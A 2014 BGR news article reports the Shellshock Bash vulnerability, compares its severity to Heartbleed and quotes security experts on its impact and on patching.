Click to Skip Ad
Closing in...

Bash is even worse than Heartbleed, and you can’t do anything about it

Published Sep 25th, 2014 2:05PM EDT
Bash vs Heartbleed Security Flaw

If you buy through a BGR link, we may earn an affiliate commission, helping support our expert product labs.

A few months ago, a serious security issue affecting millions of websites was discovered – Heartbleed – and subsequently patched by many of them, but it looks like that wasn’t the worst security scare for Internet users this year. CNET reports that a new security vulnerability has been found, the “Bash” or “Shellshock” bug, which could be even more serious than Heartbleed because it can affect a variety of Internet-connected devices, from computers to Internet-of-Things gadgets. And apparently, this huge flaw will not be easily fixed.

FROM EARLIER: Heartbleed showed us how shockingly lazy people are with their passwords

The Bash bug can be used by attackers to take over an operating system and steal confidential information, and it appears the security vulnerability is at least 25 years old.

Bash affects computers regardless of operating system – including Windows, OS X, and Linux machines – but also any other devices that use Bash commands. Bash shell code is run in the background by many programs, and attackers could append malicious code to Bash to trigger certain actions on a targeted device. As a result, regular Internet users can’t really do anything but wait for systems to be patched, which appears to be a complex job.

“This vulnerability is potentially a very big deal,” security firm Rapid 7’s engineering manager Tod Beardsley told CNET. “It’s rated a 10 for severity, meaning it has maximum impact, and ‘low’ for complexity of exploitation – meaning it’s pretty easy for attackers to use it.”

Beardsley continued, “The affected software, Bash, is widely used so attackers can use this vulnerability to remotely execute a huge variety of devices and Web servers. Using this vulnerability, attackers can potentially take over the operating system, access confidential information, make changes etc. Anybody with systems using bash needs to deploy the patch immediately.”

Security expert Robert Graham said that Bash is bigger than Heartbleed because the “bug interacts with other software in unexpected ways,” and because many programs interact with the shell. Bash could affect massive networks, and it’s not detected by security systems.

“Scan your network for things like Telnet, FTP, and old versions of Apache (masscan is extremely useful for this). Anything that responds is probably an old device needing a Bash patch. And, since most of them can’t be patched, you are likely screwed,” Graham added.

Chris Smith Senior Writer

Chris Smith has been covering consumer electronics ever since the iPhone revolutionized the industry in 2008. When he’s not writing about the most recent tech news for BGR, he brings his entertainment expertise to Marvel’s Cinematic Universe and other blockbuster franchises.

Outside of work, you’ll catch him streaming almost every new movie and TV show release as soon as it's available.